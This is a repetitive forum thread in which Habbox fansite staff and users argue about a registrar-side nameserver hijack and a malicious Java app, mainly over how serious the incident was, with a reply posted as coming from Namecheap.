Tom's eloquent reply to you, which he made several posts prior already answers the point you raise about a melodramatic stigma being created because of the Habbox.com nameservers being changed. Tom said that Habbox, like any other website or even business owes its users a duty of care when it comes to the preservation and security of personal information. Notwithstanding this, any disturbance in website uptime is a problem because it impacts Habbox's functionality.


Now now, you shouldn't criticise code in public.


Neither you nor I vandalized the Habbox.com website in attempt to exploit its members.



Anybody who is focusing their efforts on stealing a Habbo domain is obviously not a fantastic hacker otherwise they'd be going after higher priority targets who handle card data.


Another fortunate point for Habbox, although regardless when security and site uptime are interfered with it does become a problem nonetheless. So, if we can counter-exploit their exploitation of the fansite by exploiting their failures as a hacker then I say go for it!



I believe Jin has control whenever his hard drive isn't broken and I believe Matt himself thinks he doesn't need major access to the domain.

Ah, so Jin does have domain control? That's good to hear :) Matt's loyal to the fansite and Matt's secure, it's fair on his part if he doesn't want/feels like he should be given that level of access, but I'm still sticking to my opinion that he should have it nontheless.

And I bet you would be one of the first in the queue of people complaining in the Feedback forum should our database have been leaked last night about how we should be more careful with your personal information. Funnily enough, Habbox may well be a kid's fansite or whatever, but (un)fortunately we're still bound by the various UK laws, still have a responsibility to protect our users and their information and also to continue providing a good service and not just disappear overnight, as many fansites do. If it wasn't for sites like Habbox or other projects I've been involved in, I wouldn't know nearly as much as I do now, technically, and certainly wouldn't be applying for the jobs I have been recently.

Believe me, I have far bigger and better things to be doing than sitting around here helping out Habbox in any way, but I choose to because I like to have input into these things and I've seen Habbox grow (almost) right from the beginning. My ego is already as big as I need it be, I don't need to put any effort into making it any bigger, thank you very much.

No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

Don't make such comments when you don't know us at all in real life. Two people who are working for us as Site Coders and doing other various roles have jobs in real life working with servers and development. The reason why they are working for Habbox is because they know what they are actually doing and do take pride in their work.

You may not care about your personal information but Habbox does, we have to care for everyone who has ever signed up onto our website regardless if they give a dam or not. We have to follow laws and we do that because we care.

Don't make such comments when you don't know us at all in real life. Two people who are working for us as Site Coders and doing other various roles have jobs in real life working with servers and development. The reason why they are working for Habbox is because they know what they are actually doing and do take pride in their work.

I wouldn't have even justified replying to that moronic comment Matt, don't feed the trolls eh ;)

jasey - Passwords, e-mails, user names... It may not seem like much, but when the Playstation Network was compromised, the usernames, passwords and e-mails could of been used to gain entry elsewhere. In this case, someone could have their username linked to their Playstation Account (which many do) and through some magic find out how to gain entry and so forth. It's unlikely, but possible. I'm not finding it that big a deal, and I wouldn't say the people here at Habbox are either - they seem to be handling it quite well given the limitations - no drama, just honesty and swift handling of the event. They seem quite annoyed that Namecheap were so careless, and rightly so :P

In your own eyes Habbox may not be important but the site still has users, to a lot of us who work on this site (including me) we still think Habbox is an important site. The users information throughout Habbox is very important to keep safe, yes nothing has been stolen or leaked. But regardless of that, this isn't classed as "minor".

It is incredibly minor. Half the active users on this forum are staff as well. I suppose you still have aspirations and perhaps delusions about what Habbox can become and what it is, but as I said, in the grand scheme of things it isn't major. There have been worse attacks against Habbox in the past and having a talk circle about the whole thing after we have the alarmist warnings about the tragedy of what has happened just pushes it over the edge. Read the news or something and then try to realise what is major — it is certainly not a site with a few hundred active users being compromised by a script kiddie. In fact, I think the care put in to this by the six or seven people in this thread that are flippant comprises most of the care put in to this in total. It is pretty telling when the only people going on about this against what I am saying are people who are invested in the site itself.

Do they give you a sceptre to go along with your 'Management' userbar, Matt?

It is incredibly minor. Half the active users on this forum are staff as well. I suppose you still have aspirations and perhaps delusions about what Habbox can become and what it is, but as I said, in the grand scheme of things it isn't major. There have been worse attacks against Habbox in the past and having a talk circle about the whole thing after we have the alarmist warnings about the tragedy of what has happened just pushes it over the edge. Read the news or something and then try to realise what is major — it is certainly not a site with a few hundred active users being compromised by a script kiddie. In fact, I think the care put in to this by the six or seven people in this thread that are flippant comprises most of the care put in to this in total. It is pretty telling when the only people going on about this against what I am saying are people who are invested in the site itself.

Do they give you a sceptre to go along with your 'Management' userbar, Matt?

You didn't have to post in this thread at all, stop being a troll.

No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

Erm hi there. I do actually work a tech job and I'm helping out habbox at the same time.

Just my two pence now... Would you rather us not investigate it at all? because from what you're saying you're actually criticising us for doing what we're meant to do. We only know it was a feeble attempt at gaining information because we looked into it. Recursion spent the best part of a day looking into it actually. It's good that you've not put any sensitive data into the database because we haven't really asked you for any. Good to know you're using the service as you're meant to. I'll rewager that bet and say you would have been one of the first to criticise if we didn't know what the hell was going on last night, yes?

Matt's loyal to the fansite and Matt's secure, it's fair on his part if he doesn't want/feels like he should be given that level of access, but I'm still sticking to my opinion that he should have it nontheless.I agree that Matt is certainly trustworthy enough. But as a programmer you should be aware that taking unnecessary and un-useful security risks just because it shouldn't be an issue is a bad idea.

jasey - Passwords, e-mails, user names... It may not seem like much, but when the Playstation Network was compromised, the usernames, passwords and e-mails could of been used to gain entry elsewhere. In this case, someone could have their username linked to their Playstation Account (which many do) and through some magic find out how to gain entry and so forth. It's unlikely, but possible. I'm not finding it that big a deal, and I wouldn't say the people here at Habbox are either - they seem to be handling it quite well given the limitations - no drama, just honesty and swift handling of the event. They seem quite annoyed that Namecheap were so careless, and rightly so :P

Right. First off, compare the size of Habbox's userbase and the PSN userbase. Huge difference. Like, such a huge difference that Habbox is wiped off of the map in comparison. Secondly, anyone who is stupid enough in 2012 to put anything sensitive or exploitable on to a site like Habbox is careless or ignorant. I do agree that it is important to protect the information of your userbase, but really? This is not as big of a deal as people are making it out to be. This is Habbox and I am still waiting to see any serious damage from this evil act by a terrible hacker besides chips on the egos of those who manage the site. I can't stress that enough.

Right. First off, compare the size of Habbox's userbase and the PSN userbase. Huge difference. Like, such a huge difference that Habbox is wiped off of the map in comparison. Secondly, anyone who is stupid enough in 2012 to put anything sensitive or exploitable on to a site like Habbox is careless or ignorant. I do agree that it is important to protect the information of your userbase, but really? This is not as big of a deal as people are making it out to be. This is Habbox and I am still waiting to see any serious damage from this evil act by a terrible hacker besides chips on the egos of those who manage the site. I can't stress that enough.

There is still around 9000 accounts on Habbox.com, that is still a big number. And yes there is still people around in 2012 who isn't an expert in security and may not know how to protect themselves fully. We still have to deal with those users regardless if we like to or not.

No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

Well, unfortunately for you, there are many users who do trust us and who do wish their information to be kept private wherever possible, which is something we'd like to keep that way. Thankfully, I can't take any offence to your post because actually, I (as does iAdam and others) do have a day job, which is technical and I worked my way into because I am a "techie" and must at least have a clue what I'm doing, which is obviously more than can be said for some people around here. In terms of personal information, passwords and the like, the same problems exist today as they did a decade ago... humans aren't perfect, we're naturally lazy and like to use the same password for many different services.

I'd like to know how this is for the sake of nostalgia, the site is still active (in fact one of the most active Habbo fansites) and over the years a very large community of people who never have done (or no longer do) play Habbo has formed who wish to continue being a part of the Habbox community (one of which, is me). Any "breach" (I use quotes, you seem to like those) is serious, no matter how much information has been stolen and we do take them seriously, as should everyone, which is exactly why we'll be forcing password resets across the entire Habbox.com website.

Habbox aside, you may not take something like this seriously, but fortunately for the world there are people who do and make massive amounts of money doing it and your argument is fundamentally flawed.

There is still around 9000 accounts on Habbox.com, that is still a big number. And yes there is still people around in 2012 who isn't an expert in security and may not know how to protect themselves fully. We still have to deal with those users regardless if we like to or not.

I REGRET NOTHING!!!!!!!!!!

http://www.youtube.com/watch?v=SiMHTK15Pik

Edited by Martin (Forum Super Moderator): Please do not make off topic posts

I agree that Matt is certainly trustworthy enough. But as a programmer you should be aware that taking unnecessary and un-useful security risks just because it shouldn't be an issue is a bad idea.

If not Matt then give it to someone else, like Recursion who is the only person other than Jin and Sierk to be granted access to Habbox's servers since ---MAD--- and that's only happened very recently. If that had happened much earlier, many problems could have been solved. There needs to be someone who has full access to everything, who is trustworthy and not one of the twenty-something owners who have little interest in being online and are simply not able to be immediately available.

In regards of the site not being back up, there is good reason and this explains it:

Wait, so it took over 24 hours to get sierk to change the DNS...

cba reading the other idiots posts.

Erm hi there. I do actually work a tech job and I'm helping out habbox at the same time.

Just my two pence now... Would you rather us not investigate it at all? because from what you're saying you're actually criticising us for doing what we're meant to do. We only know it was a feeble attempt at gaining information because we looked into it. Recursion spent the best part of a day looking into it actually. It's good that you've not put any sensitive data into the database because we haven't really asked you for any. Good to know you're using the service as you're meant to. I'll rewager that bet and say you would have been one of the first to criticise if we didn't know what the hell was going on last night, yes?

No, frankly, I wouldn't care. My heart hasn't been in this site for a long time and I know I am speaking for quite a lot of active users when I say that. If Habbox goes, it goes. In fact, it's not an 'if' but rather a 'when'. I hate to be the realist, of course. I'd stay clear of making that bet in any case.

I'm all for you investigating this but it doesn't need to be plastered in public with people acting like it is more terrible than it is. Certainly, if you want to play internet detective then do it somewhere you can all play together without people seeing the Habbox tech team peeing contest.

Wait, so it took over 24 hours to get sierk to change the DNS...

cba reading the other idiots posts.

Jin would normally have access but as mentioned in another post he lost the details due to recent hard drive failures and this caused the name servers not being changed straight away.


No, frankly, I wouldn't care. My heart hasn't been in this site for a long time and I know I am speaking for quite a lot of active users when I say that. If Habbox goes, it goes. In fact, it's not an 'if' but rather a 'when'. I hate to be the realist, of course. I'd stay clear of making that bet in any case.

I'm all for you investigating this but it doesn't need to be plastered in public with people acting like it is more terrible than it is. Certainly, if you want to play internet detective then do it somewhere you can all play together without people seeing the Habbox tech team peeing contest.

You did not have to post in this thread at all, the discussion was actually going on fine to be honest.

Right. First off, compare the size of Habbox's userbase and the PSN userbase. Huge difference. Like, such a huge difference that Habbox is wiped off of the map in comparison. Secondly, anyone who is stupid enough in 2012 to put anything sensitive or exploitable on to a site like Habbox is careless or ignorant. I do agree that it is important to protect the information of your userbase, but really? This is not as big of a deal as people are making it out to be. This is Habbox and I am still waiting to see any serious damage from this evil act by a terrible hacker besides chips on the egos of those who manage the site. I can't stress that enough.
I thought you would make that comparison yet you've seen it the wrong way. Habbox is a minor site, which is "easy pickings". Find the e-mail, the username and any information that can lead to a take over of more important accounts such as PSN accounts and there you have it, you've done little to no leg work. Would you rather attack the FBI straight on, or find a minor character and enter easily? Same thing, and all too common in this day and age.

EDIT: An obvious example can also be what happens on Habbo far too often. Find the e-mail associated with it > take over the account or just use the e-mail to find out their Facebook and so forth. Habbo have been known to change e-mail addresses on Habbo accounts if you e-mail them and make a persuasive argument.

No, frankly, I wouldn't care. My heart hasn't been in this site for a long time and I know I am speaking for quite a lot of active users when I say that. If Habbox goes, it goes. In fact, it's not an 'if' but rather a 'when'. I hate to be the realist, of course. I'd stay clear of making that bet in any case.

I'm all for you investigating this but it doesn't need to be plastered in public with people acting like it is more terrible than it is. Certainly, if you want to play internet detective then do it somewhere you can all play together without people seeing the Habbox tech team peeing contest.

Mmhmm, you seem to care a lot right now? We never acted like it was more terrible than it was, in fact, I spent most of last night in the help desk advising people that it wasn't anything serious and reset passwords as a precaution if they ran the java app. The java app is in fact malicious so we're setting about advising users what to do if they're infected. Information is key in this which is why information was released. I honestly don't see the problem.

Also, don't worry, we had an awfully fun geek off in a skype chat while Recursion decompiled it for us. It was great.

No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid. I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?


First of all-- there's nothing wrong with wanting to work in the computer science industry and there's nothing wrong with saying or expressing you want to work in the computer science industry. Second, instead of insulting my friend Tom in a novel like fashion by doing things like calling him a teen volunteer with a stupid dream you should be saying that to me. I (hi!) developed how content is storage on Habbox.com. Passwords stored in the Habbox.com as well as forum database are hashed, salted then hashed again. So unless you're uploading nude photos of yourself in the staff uploading section of the website I should hope you have nothing to fear of a database leak.

I don't know how many times I, Matt, Tom, Chip or anyone else can tell you this before you comprehend it: Habbox cares about it's uptime and protecting users from harms way where possible. Until you develop an argument focused around why Habbox should be a heartless zombie who doesn't care if we're affiliated with hackers, then your macho "I'm smarter then everyone who cares what happens to Habbox" attitude is completely redundant.

Well, unfortunately for you, there are many users who do trust us and who do wish their information to be kept private wherever possible, which is something we'd like to keep that way. Thankfully, I can't take any offence to your post because actually, I (as does iAdam and others) do have a day job, which is technical and I worked my way into because I am a "techie" and must at least have a clue what I'm doing, which is obviously more than can be said for some people around here. In terms of personal information, passwords and the like, the same problems exist today as they did a decade ago... humans aren't perfect, we're naturally lazy and like to use the same password for many different services.

I'd like to know how this is for the sake of nostalgia, the site is still active (in fact one of the most active Habbo fansites) and over the years a very large community of people who never have done (or no longer do) play Habbo has formed who wish to continue being a part of the Habbox community (one of which, is me). Any "breach" (I use quotes, you seem to like those) is serious, no matter how much information has been stolen and we do take them seriously, as should everyone, which is exactly why we'll be forcing password resets across the entire Habbox.com website.

Habbox aside, you may not take something like this seriously, but fortunately for the world there are people who do and make massive amounts of money doing it and your argument is fundamentally flawed.

I'm going to try to branch out of replying to the cascading rebuttals to my original statement because apparently some people are plagued with delusions of grandeur.

Is that something you think is special, my friend? That is, having a day job. Humans are naturally lazy. It is effort to put on a seatbelt and if you don't then peace be with you as you fly through the smashing car window. It is effort to check the expiry date on food before you eat it and I hope all goes well when you are sitting on the loo or lying in a hospital bed with food poisoning. It is effort to ignore the constant advertisements for food that is intrinsically unhealthy and my thoughts are with the preventable cases of obsesity who may be plagued with the side effects of that condition as they age. On the same level, it is effort to use secure passwords for secure sites and different ones for sites managed by overzealous teenagers. My thoughts, specifically ones of pity, sit beside those who lose access to their online finances or something serious like that because their info was leaked from the Habbox database.

You like to avoid the bigger picture, am I right? You are speaking truth when you say that Habbox is one of the biggest Habbo fansites. In perspective, Foula is one of the biggest outlying islands in the Shetlands and I am sure all 31 people that live there — if they even still do, population has been declining — would care very much if someone stole something from one of their houses. Would it make the news in London? I'll let you answer that one.


http://www.readthehook.com/files/old/images/issues/2009/0809/cover-farm-hicks.jpg

I don't know if you are unaware that I have been around this site more or less since its launch and I no longer play Habbo actively. I understand that there is a community that sticks around here but it is a bit telling when the majority of posts on this forum come from the same few dozen people over and over, day by day. How many new users who become very active has Habbox gotten in the last three months?

I do applaud you for recognising my fondness for quotes "because I don't think some people understand what words mean" but when it boils down to things this was about as unserious as a breach can get and doesn't warrant this reaction. My argument is not fundamentally flawed as I have stated that this would be serious had this not been Habbox. PSN? Sure. PayPal? Of course. Habbo itself? Yep. This fansite? No, no one is making massive amounts of money using their scratched up microscopes to argue over the details of what happened. I almost feel like I should pay some people for the laughable things they say.

I'm going to try to branch out of replying to the cascading rebuttals to my original statement because apparently some people are plagued with delusions of grandeur.

Is that something you think is special, my friend? That is, having a day job. Humans are naturally lazy. It is effort to put on a seatbelt and if you don't then peace be with you as you fly through the smashing car window. It is effort to check the expiry date on food before you eat it and I hope all goes well when you are sitting on the loo or lying in a hospital bed with food poisoning. It is effort to ignore the constant advertisements for food that is intrinsically unhealthy and my thoughts are with the preventable cases of obsesity who may be plagued with the side effects of that condition as they age. On the same level, it is effort to use secure passwords for secure sites and different ones for sites managed by overzealous teenagers. My thoughts, specifically ones of pity, sit beside those who lose access to their online finances or something serious like that because their info was leaked from the Habbox database.

You like to avoid the bigger picture, am I right? You are speaking truth when you say that Habbox is one of the biggest Habbo fansites. In perspective, Foula is one of the biggest outlying islands in the Shetlands and I am sure all 31 people that live there — if they even still do, population has been declining — would care very much if someone stole something from one of their houses. Would it make the news in London? I'll let you answer that one.


http://www.readthehook.com/files/old/images/issues/2009/0809/cover-farm-hicks.jpg

I don't know if you are unaware that I have been around this site more or less since its launch and I no longer play Habbo actively. I understand that there is a community that sticks around here but it is a bit telling when the majority of posts on this forum come from the same few dozen people over and over, day by day. How many new users who become very active has Habbox gotten in the last three months?

I do applaud you for recognising my fondness for quotes "because I don't think some people understand what words mean" but when it boils down to things this was about as unserious as a breach can get and doesn't warrant this reaction. My argument is not fundamentally flawed as I have stated that this would be serious had this not been Habbox. PSN? Sure. PayPal? Of course. Habbo itself? Yep. This fansite? No, no one is making massive amounts of money using their scratched up microscopes to argue over the details of what happened. I almost feel like I should pay some people for the laughable things they say.

You've contradicted yourself, you show a blatant disregard for other people's personal information and you've attempted to belittle the entire Admin team here. I won't stoop to your level and continue this argument, if you wish to, you may PM me any time of day where me and the rest of the admin team will love to answer any questions you have and take any constructive criticisms you have to offer.

I'll leave you with one image, highly appropriate to this bank holiday.


http://1.bp.blogspot.com/-sRXyOP3xnDk/TtCnFZdweNI/AAAAAAAACnw/DZjZYjyPUbI/s1600/queen-come-at-me-bro.jpg

You did not have to post in this thread at all, the discussion was actually going on fine to be honest.
I don't see why I am forbidden to. I didn't have to and I probably wouldn't have if I was still outside chopping down trees but it started to rain on the acreage and I came inside. Consider it a free lesson in life that you can think about.


I thought you would make that comparison yet you've seen it the wrong way. Habbox is a minor site, which is "easy pickings". Find the e-mail, the username and any information that can lead to a take over of more important accounts such as PSN accounts and there you have it, you've done little to no leg work. Would you rather attack the FBI straight on, or find a minor character and enter easily? Same thing, and all too common in this day and age.

EDIT: An obvious example can also be what happens on Habbo far too often. Find the e-mail associated with it > take over the account or just use the e-mail to find out their Facebook and so forth. Habbo have been known to change e-mail addresses on Habbo accounts if you e-mail them and make a persuasive argument.
Yes, and I have commented on how little I am worried about those stupid enough to leave themselves that vulnerable. Barring that, you can see my reply just above this one as a sort of closing statement. I'm all for six against one fights when none of the group is willing to do anything but defend their own shadow and I am certainly giddy to go see the -REP comments that I posses no doubt have been left for me in dishing out my opinion here. However, I would like to go eat so I will let everyone continue talking about the tragic incident. If I haven't ruined the thread for everyone by disagreeing, that is.


Mmhmm, you seem to care a lot right now? We never acted like it was more terrible than it was, in fact, I spent most of last night in the help desk advising people that it wasn't anything serious and reset passwords as a precaution if they ran the java app. The java app is in fact malicious so we're setting about advising users what to do if they're infected. Information is key in this which is why information was released. I honestly don't see the problem.

Also, don't worry, we had an awfully fun geek off in a skype chat while Recursion decompiled it for us. It was great.
Good, you see, that is something I am proud of. If this interests you, then have a geek off on Skype and use this as an opportunity to analyse this little 'hack' for your amusement. If you hold important dayjobs you will know this act is low, very low, as far as how serious online compromisation can get. Seriously, though. I have nothing against having interests. What bothered me here was the sensationalism over something so paltry in the grand scheme of things. I guess there is little excitement left around here for staff.


First of all-- there's nothing wrong with wanting to work in the computer science industry and there's nothing wrong with saying or expressing you want to work in the computer science industry. Second, instead of insulting my friend Tom in a novel like fashion by doing things like calling him a teen volunteer with a stupid dream you should be saying that to me. I (hi!) developed how content is storage on Habbox.com. Passwords stored in the Habbox.com as well as forum database are hashed, salted then hashed again. So unless you're uploading nude photos of yourself in the staff uploading section of the website I should hope you have nothing to fear of a database leak.

I don't know how many times I, Matt, Tom, Chip or anyone else can tell you this before you comprehend it: Habbox cares about it's uptime and protecting users from harms way where possible. Until you develop an argument focused around why Habbox should be a heartless zombie who doesn't care if we're affiliated with hackers, then your macho "I'm smarter then everyone who cares what happens to Habbox" attitude is completely redundant.
I don't think I'm smarter than everyone else. Making a logical fallacy like that is silly, you silly billy! There are people in this thread who can do things with code I am not capable of and I don't discredit them for a second. It is clear to me I have a more solid grip on reality, however, and perhaps that is what is off-putting to you about my attitude. I have never said that Habbox shouldn't look in to this — not once. What I have been saying is that Habbox should not have treated this issue with the banshee attitude that it did. It's ridiculous.

Now comes something that requires a little more thinking for me than understanding the blindness in some people: which flavour of latte do I reckon I should have right now?

Cheers!

What I have been saying is that Habbox should not have treated this issue with the banshee attitude that it did. It's ridiculous.


Are you saying we shouldn't have overreacted? Please I do really want to know what you have to say in regards of my question.

snipEach and every website has one main priority whether they have thousands or 5 active users and that is to keep the website secure from attacks along with protecting their visitors. Just because Habbox is a little fansite for an online game doesn't mean that they shouldn't have to do that.

Perhaps you just need to have another dance off and chill:

*REMOVED*

Edited by Martin (Forum Super Moderator): Please do not post inappropriate content.

Each and every website has one main priority whether they have thousands or 5 active users and that is to keep the website secure from attacks along with protecting their visitors. Just because Habbox is a little fansite for an online game doesn't mean that they shouldn't have to do that.

Perhaps you just need to have another dance off and chill:
*REMOVED*

Ah, my Bollywood days. Do you realise how big of a hit this was in India? Err, one thing though — I do make mention of where the American president is rubbing me in the end of that video and not putting that video in a spoiler might make the moderation team anxious. Perhaps one of the dozen staff observing this thread can fix that up if you have lost the 'edit' timeframe.

Edited by Martin (Forum Super Moderator): Please stay on topic.

I'm going to try to branch out of replying to the cascading rebuttals to my original statement because apparently some people are plagued with delusions of grandeur.



"plagued with delusions of grandeur"? I think you're plagued with delusions of grandeur for simply using the phrase plagued with delusions of grandeur on what you said is a "website for teenagers". If Tom want's to sound like a technician then you want to sound like Mr. Tolkien himself.




-tldr tldr tldr-

My thoughts, specifically ones of pity, sit beside those who lose access to their online finances or something serious like that because their info was leaked from the Habbox database.



In your infinite wisdom, whilst you were calling my replies cascading rebuttals, and whilst you were saying I was being grandeur, you must of actually forgotten to read my posts because I think I already pointed out that the Habbox database being leaked would NOT be catastrophic (and that's odd, because how could you call me names based on the content of my replies unless you were actually reading them).




I don't know if you are unaware that I have been around this site more or less since its launch and I no longer play Habbo actively. I understand that there is a community that sticks around here but it is a bit telling when the majority of posts on this forum come from the same few dozen people over and over, day by day. How many new users who become very active has Habbox gotten in the last three months?



Same here, I'm user number 420 and have been here longer than you (okay so nooow I'm being grandeur), and I understand that there is a community that sticks around here who is annoyed when the website goes down, and who would be hurt if they did lose their Habbo account because unlike you I do understand that not everyone is a 24 year old taking an English degree, and that younger members would be upset by losing accounts. There is nothing wrong with that at all, I cannot fathom why you are insensitive to these ideas.




I do applaud you for recognising my fondness for quotes "because I don't think some people understand what words mean" but when it boils down to things this was about as unserious as a breach can get and doesn't warrant this reaction. My argument is not fundamentally flawed as I have stated that this would be serious had this not been Habbox. PSN? Sure. PayPal? Of course. Habbo itself? Yep. This fansite? No, no one is making massive amounts of money using their scratched up microscopes to argue over the details of what happened. I almost feel like I should pay some people for the laughable things they say.

Your argument is fundamentally flawed because when it boils down to things Habbox cares about it's uptime and protecting users from harms way where possible.



I don't think I'm smarter than everyone else. Making a logical fallacy like that is silly, you silly billy! There are people in this thread who can do things with code I am not capable of and I don't discredit them for a second. It is clear to me I have a more solid grip on reality, however, and perhaps that is what is off-putting to you about my attitude. I have never said that Habbox shouldn't look in to this — not once. What I have been saying is that Habbox should not have treated this issue with the banshee attitude that it did. It's ridiculous.

Now comes something that requires a little more thinking for me than understanding the blindness in some people: which flavour of latte do I reckon I should have right now?

Cheers!

Ah, so you don't think you're smarter than everyone else but you do think you're more rational than everyone else because you behaved differently then other people did when a website had what you're calling a "minor" interference. Yep-- that sounds like perfectly sound justification to make the broad statement that you're more rational than everyone else. Wrong. Just because other people react in situations differently than you react doesn't make you superior, and it doesn't make them wrong. It just makes you and them different from each other. No harm is coming from discussing what happened at the end of the day.

brb moving to france

back lol ¬¬¬¬¬¬

Edited by Martin (Forum Super Moderator): Please stay on topic

http://i.qkme.me/3omnqu.jpg

Although, would still be nice to know how/why Namecheap changed the nameservers.

http://i.qkme.me/3omnqu.jpg

Although, would still be nice to know how/why Namecheap changed the nameservers.

I'm curious about that as well. When Tom told me what happened this morning I lodged off a support ticket with them, and this evening they replied saying they're looking into it and will communicate with the owner of the domain. I mentioned that it would look good on them to enter the thread and explain what happened, perhaps offer an apology, but unfortunately they've not done so yet. Ah, well-- I'm not going to renew my domains with NameCheap any more I don't think.

From what I've heard there is no reason yet and Sierk/Jin are the only ones who will find out if there is one other than NameCheap being idiots however I personally doubt namecheap would admit to it happening unless there's a way to prove it.

Hello,

I am Juliet Morris, Director of Operations at Namecheap. We would like to thank Habbox for working closely with us to help resolve this issue as quickly as possible.

Also, I wanted to take a moment to address the concerns that were brought up in this thread. Please know that the security of all of our clients is a major priority and something we take very seriously. This situation was a result of many different factors, including advanced social engineering, human error, and well forged documentation.

As such, we have fully reviewed this situation and taken the steps to ensure this does not happen again, in the future. We are adding extra levels of verification to our policies and the representative involved has been let go. Your security is our first concern.

Thank you, again

Juliet Morris
Director of Operations
Namecheap, Inc.

Hello,

I am Juliet Morris, Director of Operations at Namecheap. We would like to thank Habbox for working closely with us to help resolve this issue as quickly as possible.

Also, I wanted to take a moment to address the concerns that were brought up in this thread. Please know that the security of all of our clients is a major priority and something we take very seriously. This situation was a result of many different factors, including advanced social engineering, human error, and well forged documentation.

As such, we have fully reviewed this situation and taken the steps to ensure this does not happen again, in the future. We are adding extra levels of verification to our policies and the representative involved has been let go. Your security is our first concern.

Thank you, again

Juliet Morris
Director of Operations
Namecheap, Inc.

Can you prove your NameCheap staff? or can any staff verify she is?

Never the less after this mistake your security sort of makes me feel un-easy, thus why i will be moving from NameCheap to GoDaddy in the next couple of days.
Ross

Hello,

I am Juliet Morris, Director of Operations at Namecheap. We would like to thank Habbox for working closely with us to help resolve this issue as quickly as possible.

Also, I wanted to take a moment to address the concerns that were brought up in this thread. Please know that the security of all of our clients is a major priority and something we take very seriously. This situation was a result of many different factors, including advanced social engineering, human error, and well forged documentation.

As such, we have fully reviewed this situation and taken the steps to ensure this does not happen again, in the future. We are adding extra levels of verification to our policies and the representative involved has been let go. Your security is our first concern.

Thank you, again

Juliet Morris
Director of Operations
Namecheap, Inc.

Any chance you could explain this a bit further? Particularly the documentation part, I understand how easy it can be to fall for the first two... but I'm interested in how "documentation" was created that could look real enough to convince yourselves that we wanted the nameservers changed without proper authorization.

Like many others here, I have domains held with Namecheap and this whole situation has made me uneasy about keeping them with you.

Can you prove your NameCheap staff? or can any staff verify she is?

Never the less after this mistake your security sort of makes me feel un-easy, thus why i will be moving from NameCheap to GoDaddy in the next couple of days.
Ross

